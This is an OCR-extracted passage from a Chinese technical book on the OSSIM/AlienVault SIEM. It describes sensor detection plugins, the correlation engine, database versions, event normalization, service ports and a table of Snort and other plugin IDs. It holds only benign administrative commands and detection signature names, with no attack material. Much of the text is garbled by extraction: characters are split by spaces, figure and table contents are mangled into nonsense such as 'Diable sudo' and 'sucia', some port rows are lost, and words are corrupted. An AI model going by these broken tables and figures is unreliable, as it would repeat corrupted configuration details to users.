* sudo Uno ENABLED. Diable sudo: Command executed 
*. snot ue Stop ENABLED. Disable Snort "ET POLICY Htp Client body contains pws in cleartext" 
* pmo vr stop ENABLED Disable dduser User created 
. paos up Stop ENABLED Disable 
*. sha wp Stop ENABLED Dizabie SSHe: Received disconnect 
*^— onecone w sop ENABLED Daace 


1-22 ”传感器 启用 插件 


在 OSSIM 分 布 式 应 用 中 有 多 个 传感器 ,这 时 在 图 1-21 中 可 以 查看 每 个 传感器 的 工作 状态 ， 
包括 耳 地 址 、 名 称 、 优 先 级 、 工 作 状态 等 信息 。 

OSSIM 系统 发 展 到 4.3 版 本 之 后 ， 传 感 器 查询 方式 发 生 了 变化 ， 路 径 为 Configuration 
Deployment 一 Alienvault Center— Sensor Configuration 一 Detection， 而 且 启 动 程序 也 发 生 了 变 
化 ， 由 Suritata 代替 了 Snort， 如 图 1-23 所 示 。OSSIM Server 默认 就 启动 ntop、ossec、prads、 
suricata 这 4 项 ，Snort 为 停止 状态 。 这 5 个 检测 器 的 状态 无 法 通过 Web 界面 直接 进行 修改 。 
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SENSOR CONFIGURATION 


OUTPUT DETECTION COLLECTION 


etho 
LISTENING INTERFACES 
10.32.14.0/24 IE B B a 
192.168.0.0/16 a 
MONITORED NETWORKS 
mop m 
ossec m 
DETECTORS pnás m w 
short ai oos 
sucia "E 
图 1-23 传感器 详情 


大 家 如 果 使 用 OSSIM 4.1 系统 ， 查 看 系统 检测 插件 时 ，Snort 为 启动 状态 , 但 OSSIM 4.2 后 的 
系统 Snort 是 关闭 状态 , 代替 它 的 是 性 能 更 强大 的 Suricata 系统 , 同一 个 系统 中 两 者 只 能 任 选 其 一 。 
而 Prads (Passive RealTime Asset Detection System) 是 OSSIM 4.2 之 后 又 一 款 被 动 实 时 资产 探测 系 
统 ， 它 的 主要 功能 就 是 保存 被 判断 资产 特征 ， 如 同一 个 指纹 库 ， 保 存 了 各 种 系统 特征 ， 可 以 识别 
资产 的 操作 系统 类 型 、 由 ARP 发 现 新 增资 产 ， 根 据 开放 端口 判断 打开 的 网 络 应 用 ， 因 为 各 种 设备 
和 服务 打开 状态 并 不 是 一 成 不 变 ， 所 以 需要 用 Prads 来 监控 变化 后 的 状态 。 


1.2.10 ”关联 引擎 

关联 引擎 (Server) 是 OSSIM 安全 集成 管理 系统 的 核心 部 分 ， 它 支持 分 布 式 运行 ， 负 责 
将 Agents 传送 来 的 归 一 化 安全 事件 进行 关联 分 析 ， 并 对 网 络 资产 进行 风险 评估 。 其 工作 流程 
如 图 1-24 所 示 。 


Snort 
Agent 


Nmap 
Agent 数据 库 
Nessus EDB 
Agent 
OpenVas 
Agent 


124 关联 引擎 的 工作 流程 
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OSSIM 服务 器 的 核心 组 件 功能 包含 : 事件 关联 、 风 险 评估 和 确定 优先 次 序 和 身份 管理 、 
报警 和 调度 、 策 略 管理 、IP 信誉 管理 等 ， 其 配置 文件 在 /etc/ossim/server 目录 中 ， 文 件 分 别 为 : 


€  alienvault-attacks.xml 
alienvault-bruteforce.xml 
alienvault-dos.xml 

alienvault-malware.xml 
alienvault-network.xml 


alienvault-scan.xml 
©  alienvault-policy.xml 


以 上 这 些 文件 由 开源 OSSIM 免费 提供 ， 策 略为 84 4k. E USM 中 则 具有 2000 多 条 。 它 
们 采用 XML 编写 易于 理解 ， 维 护 简单 。 
关联 引擎 结构 如 图 1-25 所 示 ， 其 工作 过 程 由 下 面 6 个 步骤 组 成 ; 


A O 
l 
" DB | Date/sensor/1601.log 
Listener 
ecd Date/sensor/1604.log 
Engine pum Date/sensor/1607.log 
m 


— 


图 1-25 关联 引擎 的 结构 


(1) 40001/tcp: Server 首先 监听 40001/tep 端口 ， 接 收 Agent 连接 和 Framework 请 求 。 
该 端口 大 小 由 OSSIM 系统 在 配置 文件 /etc/ossim/ossim_setup.conf 中 定义 。 


我 们 在 OSSIM 系统 中 通过 以 下 命令 可 以 清晰 查看 到 其 工作 端口 。 


#1lsof -Pnl +M -i4 |grep ossim-ser 


(2)Connect: 当 连 接 到 端口 为 40002 指定 的 Agent 时 , 连接 到 端口 为 40001 的 其 他 Server 
对 采集 事件 进行 分 配 和 传递 。 该 端口 号 在 /etc/ossim/agent/config.cfg 文件 的 [output-idm] 项 配 
置 ， 不 建议 更 改 。 

(3) Listener: 接收 各 个 Agent 的 连接 数据 ， 并 细 分 为 Forwarding Server 连接 、Framework 
连接 。 

(4) DB Connect: 主要 是 OSSIM DB 连接 、Snort DB 连接 和 OSSEC DB 连接 。 

(5) Agent Connect: 启动 Agent 连接 ，Forwarding Server 连接 。 

(6) Engine: 事件 的 授权 、 关 联 、 分 类 。 


在 OSSIM 系统 关联 引擎 的 状态 可 在 Configuration 一 Deployment 一 Components 一 Servers 中 
查看 ， 如 图 1-26 所 示 。 
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DEPLOYMENT 


COMPONENTS | SCHEDULER  SMARTEVENTCOLLECNON LOCATIONS 

ALIENVAULT CENTER | SENSORS | SERVERS REMOTE INTERFACES 

W| 20 EN NEW DELETESELECTED MODIFY  «» Total Servers: 1 
" niue port sea esewr CORRELATON coston iior AAM HE osem sion FORAAND FORWARD Description 


192.158.11.105 oasim411 P e * . . . . . * aok 


图 1-26 关联 引擎 模块 工作 状态 


关联 引 警 启动 
OSSIM 系统 会 启动 关联 引擎 ， 有 时 系统 调试 也 需要 用 到 手工 启动 方式 ， 命 令 如 下 : 


#ossim-server -d -c /etc/ossim/server/config.xml 


查看 OSSIM Server 版 本 。 


#ossim-server -v 


1.2.11 数据库 (Database) 

OSSIM 关联 引擎 (简称 OSSIM Server) 将 事件 关联 结果 写 入 数据 库 。 系 统 用 户 可 通过 
Framework (Web 前 端 控制 台 ) 对 Database 进行 访问 。 数 据 库 中 alienvault.event 表 是 整个 系统 
事件 分 析 和 策略 调整 的 信息 源 。OSSIM 从 总 体 上 将 其 划分 为 事件 数据 库 (EDB )、 知 识 数据 库 

(KDB)、 用 户 数据 库 (UDB)。OSSIM 数据 库 用 来 记录 与 安全 事件 关联 及 配置 等 相关 的 信息 ， 
对 应 于 设计 阶段 的 KDB 和 EDB 的 关联 事件 部 分 。 在 Framework 中 使 用 ACID/BASE 来 作为 
Snort 数据 库 的 前 端 控制 台 ， 对 应 于 设计 阶段 的 EDB。 此 外 ACL 数据 库 相 关 表 格 可 包含 在 
OSSIM 数据 库 中 ， 用 来 记录 用 户 行为 ， 对 应 于 设计 阶段 的 UDB JE. 

OSSIM 数据 库 分 关系 型 数据 库 和 非 关 系 型 数据 库 。OSSIM 系统 默认 使 用 的 MySQL 监听 
端口 是 3306， 为 增强 其 处 理性 能 ， 在 Alienvault USM 中 采用 MongoDB 作为 非 关系 型 数据 库 。 
2013 年 将 OSSIM 4.2 发 行 版 中 用 Percona_server5.5 蔡 换 了 原来 的 MySQL 5.1， 由 于 使 用 了 
XtraDB 存储 引擎 , 而 且 对 MySQL 进行 了 优化 和 改进 , 使 其 在 功能 和 性 能 上 明显 提升 。 在 2015 
年 最 新 版 本 USM 5.0 中 将 Percona_server 升级 为 功能 强大 的 5.6.23. OSSIM 主要 版 本 数据 库 变 
EWK 1-4。 


表 1-4 OSSM 主要 版 本 数据 库 变迁 


版 本 数据 库 

OSSIM 3.1 MySQL-server 5.1 
| OSSIM 4.1 Percona-server-5.5.23 
| OSSIM 4.2 Percona-server-5.5.25 
| OSSIM 4.3 Percona-server-5.5.29 
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( 续 表 ) 


数据 库 


Percona-server-5.5.33 
Percona-server-5.5.33 


OSSIM 4.4 
OSSIM 4.5 


OSSIM 4.6-4.9 Percona-server-5.5.33-31 
OSSIM 4.10-4.15 Percona-server-5.5.33-31.1 
OSSIM USM 5.0 Percona-server-5.6.23-72.1 


OSSIM USM 5.1 Percona-server-5.6.23-72.1 


1.2.12 Web 框架 (Framework) 

第 1.1 节 介绍 过 OSSIM 系统 涉及 LAMP 环境 ， 由 Perl/Python/PHP 开发 工具 融合 
在 一 起 (在 /usr/share/ossim/scripts/ 等 路 径 下 有 着 大 量 *.py、*.sh 和 *.php、*.pl 等 脚本 文 
件 )， 它 们 发 挥 各 自 的 优势 ， 其 中 Web 框架 (Framework) 控制 台 ， 提 供用 户 Web 页 面 
从 而 控制 系统 的 运行 (例如 设置 策略 )， 是 整个 系统 的 前 端 ， 用 来 实现 用 户 和 系统 之 间 
的 交互 。 

Framework 可 以 细 分 为 2 个 部 分 : Frontend 可视化 管理 前 端 》 主 要 采用 PHP 语言 编写 ， 
它 是 系统 的 一 组 Web 页 面 ， Frameworkd 是 一 个 守护 进程 ， 采 用 Python 编写 ， 主 要 脚本 在 
/usr/share/ossim-framework/ossimframework/ 目 录 下 ， 它 绑 定 OSSIM 的 知识 库 和 事件 库 ， 监 听 
端口 是 40003 CfE/etc/ossim/ossim setup.conf 配置 文件 以 及 /etc/ossim/server/config.xml 中 ) 可 以 
查看 到 相关 端口 定义 的 信息 ， 同 样 通过 命令 (结果 如 图 1-27 所 示 ) 查看: 


#1lsof -Pnl +M -i4|grep ossim-fra 


图 1-27 查看 端口 


通过 以 上 命令 可 以 清楚 查看 到 服务 端口 信息 , 了解 这 些 信息 对 于 我 们 理解 它 的 工作 原理 有 
好 处 ， 它 负责 将 Frontend 收 到 的 用 户 指令 和 系统 的 其 他 组 件 相关 联 ， 并 绘制 Web 图 表 供 前 端 
显示 。 在 OSSIM 系统 中 ，Framework 安装 了 Apache+Php+Adodb 来 搭建 支持 PHP 的 Web 
Server， 安 装 phpgacl 处 理 用户 权 限 ， 安 装 Mrtg、RRdtool 绘制 监控 图 ， 安 装 ACID/BASE 作为 
事件 的 前 端 控制 台 。 
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1.2.13 Ajax 创建 交互 

OSSIM 的 Web UI 具有 很 强 的 可 定制 性 , 允许 用 户 更 改 默认 的 系统 功能 , 可 根据 自己 喜好 ， 
对 其 显示 位 置 进行 个 性 化 定制 ， 比 如 个 性 化 的 主页 或 仪表 盘 或 者 SIEM 控制 台 , 根据 情况 增加 
/删除 过 滤 插 件 , 这 些 后 台 通 过 jQuery ESI C/usr/share/ossim/www/js/) jQueryUI 比 JavaScript 
更 简单 ， 减 少 了 复杂 的 交互 。 在 OSSIM 的 Web UI 中 利用 Ajax+jQuery 技术 实现 UI 创建 具有 
各 种 定制 功能 。 可 以 说 没有 Ajax*jQuery 就 没有 OSSIM UI 中 各 种 丰富 的 交互 式 图 表 的 展示 。 

PHP 开发 人 员 在 框架 中 实现 Ajax (Asynchronous Javascript And XML， 异 步 JavaScript 和 
XML) 技术 。 在 框架 中 使 用 Ajax 技术 可 以 改变 传统 B/S 应 用 程序 的 一 些 棘 端 ， 例 如 对 用 户 反 
应 不 灵敏 等 。 传 统 的 Web 应 用 中 ， 用 户 总 是 处 于 提交 、 等 待 、 响 应 过 程 中 。 而 利用 Ajax 技术 
提供 了 客户 端 与 服务 器 异步 通信 的 能 力 ， 从 根本 上 让 用 户 从 请 求 、 等 待 、 响 应 的 循环 中 解脱 出 
来 ,在 OSSIM 中 从 哪里 查看 昵 ? 从 /usr/share/ossim/www/assets/ajax 下 的 程序 分 析 得 知 , OSSIM 
前 台 框 架 采 用 了 Ajax 技术 。 

在 OSSIM 前 台 框架 的 描述 网 页 中 有 很 多 页 面 , 它们 有 着 相似 之 处 , 我 们 使 用 Ajax 加 
载 不 同 的 地 方 即 可 ， 这 样 提高 了 页 面 加 载 速度 ， 用 Ajax 还 可 以 让 页 面 不 用 刷新 ， 也 能 显 
示 不 同 内 容 。 OSSIM 系统 可 以 说 UI 离 不 开 Ajax 技术 , 其 整个 UI 可 看 成 是 基于 JavaScript 
事件 驱动 ， 数 据 由 XML HTTP 获取 。 详 细 过 程 大 家 可 阅读 usr/share/ossim/www/js/prototype.js 
源码 。 

实例 : 为 什么 在 OSSIM Web UI 中 加 载 图 像 时 会 出 现 Loading Widget 的 提示 ?如 图 1-28 
所 示 。 


LATEST SIEM VS LOGGER EVENTS 


$ 
ding 


1-28 图 形 加 载 瞬间 显示 
在 OSSIM 中 ， 通 过 Ajax 向 页 面 中 加 载 内 容 时 ， 由 于 机 器 问题 会 出 现 “Loading Widget" 
提示 ， 伴 随 菊花 圈 不 停 旋 转 ， 这 时 页 面 在 加 载 控件 。 如 果 读者 具有 PHP 基础 ， 还 可 以 继续 分 
Vr/usr/share/ossim/www/dashboard/sections/wizard/wizard.php 和 /usr/share/ossim/www/dashboard/js/ 


analytics_duo.js。 


1.2.14 ” 归 一 化 处 理 

安全 事件 关联 的 基础 是 安全 事件 的 归 一 化 , 也 就 是 将 不 同 数据 源 的 安全 事件 (表示 的 格式 
不 同 ), 以 及 对 同一 攻击 特征 产生 的 攻击 类 型 命名 不 一 致 问题 (意味 着 安全 事件 的 名 称 不 一 致 ) 
进行 归 一 化 的 过 程 。 首 先 了 解 一 下 日 志 处 理 的 步骤 ， 如 图 1-29 所 示 。 
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原始 日 志 数据 


日 志 分 析 的 第 一 个 输入 流程 


搜索 我 们 关心 的 日 志 消 息 ， 
日 志 以 减 小 存储 空间 ， 降 低 


将 原始 日 志 消 息 中 的 各 个 元 素 映射 到 一 个 统一 的 
格式 ， 处 理 完 之 后 的 日 志 称 为 事件 ， 这 对 关联 很 
重要 。 


分 析 多 个 离散 事件 的 共性 ， 比 如 统计 事件 数 
量 或 者 根据 规则 来 分 析 事 件 等 。 


1-29 日 志 处 理 步骤 


该 过 程 是 对 报警 信息 进行 格式 的 统一 规范 化 , 将 报警 信息 进行 分 析 与 解码 , 把 报警 信息 中 
的 关键 字段 提取 出 来 ， 存 储 在 统一 的 结构 体 中 ， 并 按 不 同 的 类 分 别 归结 为 一 起 。 


1.2.15 ”标准 的 安全 事件 格式 

归 一 化 处 理 的 事件 不 仅 需 要 统一 格式 , 而 且 需 要 专门 的 属性 , 我 们 来 看 几 个 典型 字段 及 其 
说 明 : 
Alarm: 报警 名 称 。 
Event id: 安全 事件 编号 。 
Sensorid: 发 出 事件 的 传感器 编号 。 
Source IP: src_ip: 安全 事件 源 IP 地 址 。 
Source Port: src_port: 安全 事件 源 端口 。 
Type: 类 型 分 为 两 类 一 类 是 detector, 3 — X X monitor, 
Signature: 触发 安全 事件 的 特征 值 。 
Reliability: 安全 事件 的 可 信 度 ( 描述 了 一 个 检测 到 的 攻击 是 否 真 的 成 功 可 能 性 ， 便 
面 反映 了 安全 事件 的 严重 性 质 ) 。 

为 了 更 好 地 学 习 第 2 章 介绍 的 SIEM 控制 台 ， 我 们 先 了 解 几 个 统一 格式 安全 事件 的 实例 。 
在 Redis 服务 器 中 处 理 大 量 的 非 结 构 化 数据 ， 但 最 终 经 过 一 系列 规则 检测 发 出 的 报警 ， 再 经 过 
聚合 后 产生 的 聚合 报警 具有 统一 格式 ， 并 集中 存储 在 MySQL 数据 库 中 。 下 面 给 出 典型 的 记录 
格式 。 


(1) Raw Log 典型 记录 格式 如 图 1-30 所 示 。 


33 


全 运 维 平台 一 一 OSSIM 最 佳 实践 


Event type. Event Detail 
Sensor Product Type. Category Sub-Category 
Userdatal Userdataz | Userdata3 Userdata4 Userdata5 Userdata6 Userdata7 UserdataB | UserdataS 
| 
Mmsrcusemame | Wm sre domain | idm sre hostname | támsrcmac | idm dstusemame | Mim dst domain | wim dst hostname Mim dst mac 
| 


图 1-30 Raw Log 记录 格式 
(2) SIEM 事件 归 一 化 记录 格式 如 图 1-31、 图 1-32 所 示 。 


Date Event Date Alienvault Sensor Interface 
Triggered Signature Event Type ID Category Sub-Category 
Normailized 
Event Data Source Name Product Type Data SourcelD 
Source Address | SourcePort | Destination Address | Destination Port Protocol 
图 1-31. 事件 归 一 化 处 理 格式 
Unique Event ID# | Asets S-*D. Priority Reliability Risk 
User name Userdatal Userdata2 Userdata3 Userdata4 
SIEN 0 Src Username Domain. | Src Hostname | Src Mac Dst Username@Domain Dst Hostname Dst Mac 
Source Address Priority Reliability | Activity Destination Address Priority Reliability | Activity 
Reputation + + + 
Source 
Hostname IP Mac Context 
Latest Update Services Users Info 
Context PEE 
Destination 
Hostname IP Mac Context 
Latest Update Services Users Info 
1-32 SIEM 记录 格式 
在 OSSIM 中 的 事件 是 如 何 实现 存储 呢 ? 传感器 从 各 种 网 络 设备 和 服务 器 上 通过 Rsyslog 
服务 收集 原始 日 志 ， 存 储 在 Sensor 所 在 服务 器 的 硬盘 等 待 处 理 ， 当 收 到 日 志 后 ， 安 装 在 探 针 


服务 器 上 的 代理 开始 工作 , 利用 事先 设 定 好 的 安全 插件 开始 对 日 志 进 行 预 处 理 (也 就 是 进行 归 
一 化 处 理 )， 流 程 如 图 1-33 所 示 。 
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探 针 中 设置 
的 安全 模块 


图 1-33 ”传感器 日 志 采 集 流 程 


Agent 将 插件 收 到 的 日 志 送 往 Server 再 进行 深度 加 工 , 将 字段 按照 类 别 重 新 组 合成 下 面 的 
格式 (这 样 就 从 RAW Log 变 成 了 归 一 化 处 理 的 日 志 ， 归 一 化 处 理 格式 如 表 1-5 所 示 。 


表 1-5 归 一 化 处 理 日 志 格式 


Userdatal ~Userdatas 
Userdata6 ~Userdata9 


归 一 化 处 理 ， 重 要 字段 含义 如 下 : 


源 和 目标 地 址 : 在 关联 分 析 中 属于 很 重要 的 内 容 。 
源 和 目标 端口 : 可 以 分 析 访 问 和 试图 访问 的 那些 服务 端口 。 
消息 分 类 : 根据 用 户 登录 成 功 、 失 败 或 者 尝试 的 消息 分 类 。 
WA: 这 里 包括 日 志 消 息 在 设备 上 产生 的 时 间 和 系统 接收 消息 的 时 间 (因为 有 各 
种 延迟 存在 ， 时 间 不 同 ) 。 
优先 级 : 例如 网 络 设备 ( 交换 机 ) 的 日 志 包 含 了 优先 级 (设备 供应 商 制 定 ) 。 作 为 
规范 化 的 一 部 分 也 需要 日 志 包 含 优先 级 。 

e du: 通过 哪个 网 络 接口 接收 到 的 日 志 消息 。 

原始 日 志 是 规范 化 过 程 的 一 个 重要 环节 ，OSSIM 在 归 一 化 处 理 日 志 的 同时 也 保留 了 原始 
日 志 ， 可 用 于 日 志 归 档 ， 提 供 了 一 种 从 规范 化 事件 中 提取 原始 日 志 的 手段 。 

经 过 归 一 化 处 理 的 日 志 , 再 通过 TCP 3306 端口 存储 到 MySQL 数据 库 中 , 如 图 1-34 所 示 。 
接着 就 由 关联 引擎 根据 规则 、 优先 级 、 可 靠 性 等 参数 进行 交叉 关联 分 析 ， 得 出 风险 值 并 发 出 各 
种 报警 提示 信息 详情 在 后 续 章 节 再 分 析 )。 
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TCP 3306 


图 1-34 日 志 存储 
接 下 来 ， 我 们 再 看 个 实例 ， 下 面 是 一 段 Apache 的 原始 日 志 ， 如 图 1-35 所 示 。 


AV - Alert - "1379273775" --» RID: "31101"; RL: "5"; RG: "web,accesslog,"; RC: "Web server 400 
error code."; USER: "None"; SRCIP: "192.168.11.3"; HOSTNAME: "server"; LOCATION: 
"/var/log/apache2/access.log"; EVENT: "[INIT]192.168.11.3 - - [16/Sep/2013:03:36:14 +0800) "GET 


/phpmyadmin HTTP/1.1" 

404 1861 "~" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10 8 4) AppleWebKit/536.30.1 (KETML, like Gecko) 
Version/6.0.5 

Safari/536.30.1"[END]"; 


图 1-35 原始 日 志 


先 经 过 OSSIM 系统 收集 加 工 后 , 再 通过 Web 前 端 展现 给 大 家 , 方便 阅读 的 格式 如 图 1-36 
所 示 。 归 一 化 处 理 后 的 事件 和 原始 日 志 的 对 比方 法 我 们 在 后 面 还 会 讲解 。 


Dote ANenvoult Sensor Interfoce 
2013-09-16 03:36:15 CMT«8:00 server [192.168.11.7] eho 
Triggered Signature Event Type ID Category Sub-Category 
Nomad ossec Web server 400 error code. 310 Application Web Not Found 
Event Data Source Nome Product Type Dato Source 1D 
o5sec-accessiog Operating System 7058 & 
Source Address Source Port Destination Address Destination Port Protocol 
192.168.11.3 Q 0 00.0.0 0 TCP 
Unique Event ID# Asset S+ D Priority. Reliability Risk 
1e3e11e3-84d09-0800-2765-292315b2db52. ->2 H 1 9 
m username userdatol userdota2 


Webserver 400 192.168.11.3 - - [16/5ep/2013:03:36:14 +0800] "GET /phpmyadmin HTTP/1.1* 404 1861 "." "Mozilla/S.0 (Macintosh; Intel 


isse error code. Mac OS X 10.8. 4) AppleWebKit/536.30.1 (KHTML, like Gecko) Version/6.0.5 Safari/536.30.1" 


1-36” 归 一 化 处 理 以 后 的 Apache 访问 日 志 


在 图 1-36 所 示 的 例子 当中 ， 仅 使 用 了 Userdatal 和 Userdata2， 并 没有 用 到 Userdata3 一 
Userdata9， 这 些 是 扩展 位 ， 主 要 是 为 了 预 留 给 其 他 设备 或 服务 使 用 。 

经 过 归 一 化 处 理 之 后 ， 目 标 地 址 会 标记 成 Host-IP 地 址 的 形式 ， 例 如 : Host-192-168-0-1。 
实际 上 归 一 化 处 理 这 种 操作 发 生 在 系统 采集 和 存储 事件 之 后 ， 关 联 和 数据 分 析 之 前 ， 在 SIEM 
工具 中 把 采集 过 程 中 数据 转换 成 易 读 懂 的 格式 ， 如 同 图 1-37 显示 的 那样 ， 采 用 格式 化 的 数据 
我 们 能 更 容易 理解 。 
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events 
0sJ-IP 地 址 或 者 WAC 地 址 


D] scwwrunE DarEGursoow sensor source DESTINATION wx — qm 


x VinwalusMAllinone — [nest1032 22326] Host-10.3222.126. a 
VimusIUSMAlinOne ——— Host-103222-126. Host-10-3222126. 日 


1-37 SIEM 控制 台 下 的 主机 标识 形式 


1.2.16 OSSIM 服务 端口 


OSSIM 核心 组 件 包括 两 部 分 ,一 部 分 是 服务 器 (Server)， 另 一 部 分 是 传感器 (Sensor)。Server 
包括 Server, Web Framework, Database, Identity Management, Vulnerability Management。 而 Sensor 
包括 Agent, Vulnerability Scanner. Log Collection。 它 们 通信 端口 如 表 1-6、 表 1-7 所 示 。 


表 1-6 OSSIM 开放 服务 器 端口 分 配 表 


协 议 端 口 进程 作 用 
[re [22 [sd | Alienvault api 服务 器 与 Sensor 之 间 远 程 通信 
Hitps-Web UI 
TCP 40001 Alienvault-server 服务 器 进程 与 Agent 之 间 通 信 端口 
| rce |3306 | mysqld | Server f framework i£ MySQL 数据 库 的 通信 端口 
Alienvault-idm-identity 身份 认证 进程 
TCP 40003 Alienvault 框架 的 Web UI 进程 ， 由 
work letc/ossim/server/config.xml 控制 
OSSIM 服务 器 之 间 的 Log 传送 端口 ( 仅 在 USM 中 ) 
Alienvault Smart Event Collection Service (ILZE USM 中 ) 
API 通 信 端 口 ， 绑 定 IP 为 127.0.0.1 
| upp | sia | rsysoga | Rsyslog, 日 志 收集 服务 
TCP 11211 缓存 服务 器 端口 
TCP 5672 消息 服务 器 (AMQP) 
TCP 6379 Redis-server 消息 队列 存储 、 加 速 
TCP 3128 squid 反 向 代理 
TCP 27017 mongod MongoDB 通信 端口 〈 仅 在 USM 中 ) 
表 1-7 OSSIM 传感器 端口 分 配 表 
SSH 远程 安全 连接 
NetFlow 探 针 
OpenVAS 管理 客户 端 (进程 名 为 openvassmd ，Manager 
daemon of the Open Vulnerability Assessment System ) 
openvassd OpenVAS 漏洞 扫描 进程 ，The Scanner of the Open 
Vulnerability Assessment System. 
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( 续 表 ) 


Munin， 传 感 器 的 监视 服务 器 
为 Syslog 协议 通信 使 用 ， 作 为 日 志 收 集 服务 
OssecServer 和 Agent 之 间 的 通信 端口 ， 作 为 代理 管理 服务 通 
信 端 口 使 用 

远程 传感器 通过 VPN 连接 Server 的 通信 端口 

用 于 Netflow 收集 在 OSSIM 系统 中 文件 /etc/nfsen/nfsen.conf 
负责 定义 ， 分 布 式 环境 中 多 个 Sensor 启用 了 Netflow， 则 端 
口号 依次 为 12000、12001、12002 等 
NTOP 流量 监控 


了 解 上 述 服 务 端 口 的 作用 ， 对 于 今后 维护 OSSIM 非常 有 帮助 。 例 如 发 生 OSSIM Sever 停 
止 运行 的 故障 ， 如 何 找 原 因 ? 当 OSSIM Server 停止 运行 后 ， 它 将 不 再 监听 40001 端口 ， 此 时 
传感器 发 送 回来 的 数据 也 就 无 法 收集 到 ， 首 先 查看 端口 情况 。 

#netstat -lnt |grep 4000 

tcp 0 0 0.0.0.0 40003 0.0.0.0; * LISTEN 


正常 时 40001. 40002. 40003. 40004 端口 处 于 监听 状态 ， 一 旦 出 现状 况 后 只 有 40003 端 
口 在 监听 。OSSIM 处 理 流程 与 通信 端口 的 关系 如 图 1-38 所 示 。 


€ © webul 


图 1-38 OSSIM 端口 通信 情况 
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基于 插件 的 日 志 采 集 


由 于 现 有 安全 设备 产生 日 志 格 式 不 统一 ， 故 无 法 直接 进行 关联 分 析 ， 在 OSSIM 系统 中 采 
取 了 基于 插件 过 滤 的 方式 对 异 构 安防 设备 的 日 志 进行 分 类 采集 。 


1.3.1 安全 事件 分 类 
经 过 分 析 发 现 ， 这 些 安防 设备 的 日 志 之 间 既 有 共性 也 有 差异 ， 我 们 可 以 按 基本 类 型 、 子 类 
型 和 详细 类 型 3 个 层次 对 安全 事件 进行 分 类 : 


e ”信息 危害 类 
e ”攻击 入 侵 类 
e ”恶意 代码 类 
e ”信息 探测 类 


13.2 ”采集 思路 

针对 这 种 安全 日 志 格 式 及 描述 内 容 不 统一 的 问题 ， 在 OSSIM 中 采取 了 基于 插件 的 事 
件 采 集 代理 的 收集 模式 ， 其 基本 思路 是 通过 插件 来 完成 日 志 格式 化 ， 在 事件 采集 代理 中 部 
署 若 干 个 插件 ， 每 个 插件 负责 采集 某 种 服务 或 设备 的 日 志 并 格式 化 ， 再 将 服务 对 应 端口 和 
插件 表示 号 进行 关联 与 绑 定 ， 这 样 做 的 优势 在 于 当 采 集 代理 接收 到 设备 向 监听 端口 发 送 的 
日 志 后 ， 即 可 直接 调用 对 应 的 插件 来 完成 日 志 格式 化 任务 ， 且 每 个 插件 只 能 接收 绑 定 端口 
发 送 的 日 志 ， 从 而 提高 了 安全 事件 采集 的 执行 效率 。 表 1-8 中 列举 了 OSSIM 系统 中 数据 源 
与 插件 ID 的 关系 。 


表 1-8 OSSIM 主要 数据 源 ID (plugin sid) 与 插件 对 应 描述 


Plugin sid 数据 源 描述 


1001 snort Snort Rules snort syslog.cfg 
g Snort Tagging 

1003 snort-preprocessors Snort Dynamic Alert 

1100 snort spp portscan Snort: Portscan preprocessor 

1101 snort spp minfrag Snort: Minfrag preprocessor 

1102 snort http decode Snort: HTTP decoder preprocessor 

1103 snort spp defrag Snort: defragmenter preprocessor 

1104 snort spp anomsensor Snort: SPADE preprocessor 

1105 snort spp bo Snort: Back Orifice preprocessor 

1106 snort spp rpc decode Snort: RPC preprocessor 

1108 snort spp stream3 Snort: stream preprocessor 

1109 snort spp telnet Snort: telnet option decoder preprocessor 
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( 续 表 ) 

Plugin sid 名 称 数据 源 描述 插件 
1110 snort spp unidecode Snort: Unicode decoder preprocessor snort syslog.cfg 
1111 snort spp stream4 Snort: Stream4 preprocessor 
1112 snort spp arpspoof Snort: ARP spoof detector preprocessor 
1114 snort spp fnord Snort: NOP detector preprocessor 
1115 snort spp asnl Snort: ASN.1 validator preprocessor 
1116 snort snort decoder Snort: internal decoder preprocessor 
1117 snort spp portscan2 Snort: portscan preprocessor 
1118 snortspp conversation Snort: conversation preprocessor 
1119 snort http inspect Snort: http data check preprocessor 
1120 snort http inspect ano Snort: anomalous http server preprocessor 

malous 
1121 snort flow-portscan Snort: flow decoder preprocessor 
1122 snort portscan Snort: portscan decoder preprocessor 
1123 snort frag3 Snort: fragmentation decoder preprocessor 
1124 snort smtp Snort: SMTP preprocessor 
1125 snort ftp pp. Snort: FTP preprocessor 
1126 snort telnet pp Snort: telnet preprocessor 
1128 snort ssh Snort: SSH preprocessor 
1129 snort _stream5 Snort: TCP preprocessor 
1130 snort dcerp Snort: DCE/RPC server preprocessor 
1131 snort dns Snort: DNS preprocessor 
1133 snort dcerpc2 Snort: DCE/RPC server preprocessor v2 
1134 snort ppm Snort: ppm preprocessor 
1135 snort internal Snort: internal preprocessor 
1138 snort sensitive data Snort: sensitive data preprocessor 
1139 snort sensitive data2 Snort: sensitive data preprocessor 
1140 snort sip. Snort: SIP preprocessor 
1141 snort imap Snort: IMAP preprocessor 
1142 snort pop Snort: POP preprocessor 
1144 snort modbus Snort: Modbus preprocessor 
1501 apache Apache apache.cfg 
1502 iis IIS. iis.cfg 
1503 iptables Iptables iptables.cfg 
1507 rrd threshold RRD Threshold md.cfg 
1510 cisco-router Cisco router cisco-router.cfg — | 
1511 pof Passive OS fingerprinting tool pOf.cfg 
1514 cisco-pix Cisco PIX cisco-pix.cfg 
1515 cisco-ids Cisco Secure IDS cisco-ids.cfg 
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( 续 表 ) 

Plugin sid 名 称 数据 源 描述 插件 
1517 ntsyslog Windows 系统 syslog 服务 ntsyslog.cfg 
1518 snarewindows Snare 代理 for Windows snare.cfg 
1519 netgear Netgear 网 件 路 由 器 /交换 机 netgear.cfg 
1520 netscreen-manager Juniper Netscreen Security Manager netscreen-firewal 

Lcfg 
1521 | postfix Postfix mailer postfix.cfg 
1523 heartbeat HeartbeatLinux 高 可 用 软件 heartbeat.cfg 
1524 spamassassin Spamassassin: 反 垃圾 邮件 工具 spamassassin.cfg — | 
1525 nagios Nagios: 主机 /服务 /网 络 监控 管理 系统 nagios.cfg 
1526 stonegate Stonegate 防火 墙 stonegate.cfg 
1527 cisco-vpn Cisco VPN cisco-vpn.cfg 
1529 ipfw FreeBSD ipfw 防火 墙 ipfw.cfg 
1530 gfi mailsecurity GFI MailSecurity 邮件 安全 网 关 gfi.cfg 
1551 intrushield McAfee IntruShield syslog intrushield.cfg 
1553 quid Squid quid.cfg 
1554 fortigate Fortinet / Fortigate 防火 墙 fortigate.cfg 
1555 clamav Clam AntiVirus 类 UNIX 系 统 中 反 病毒 软件 | clamav.cfg 
1556 symantec-ams Symantec AntiVirus Corporate Edition symantec.am s.cfg 
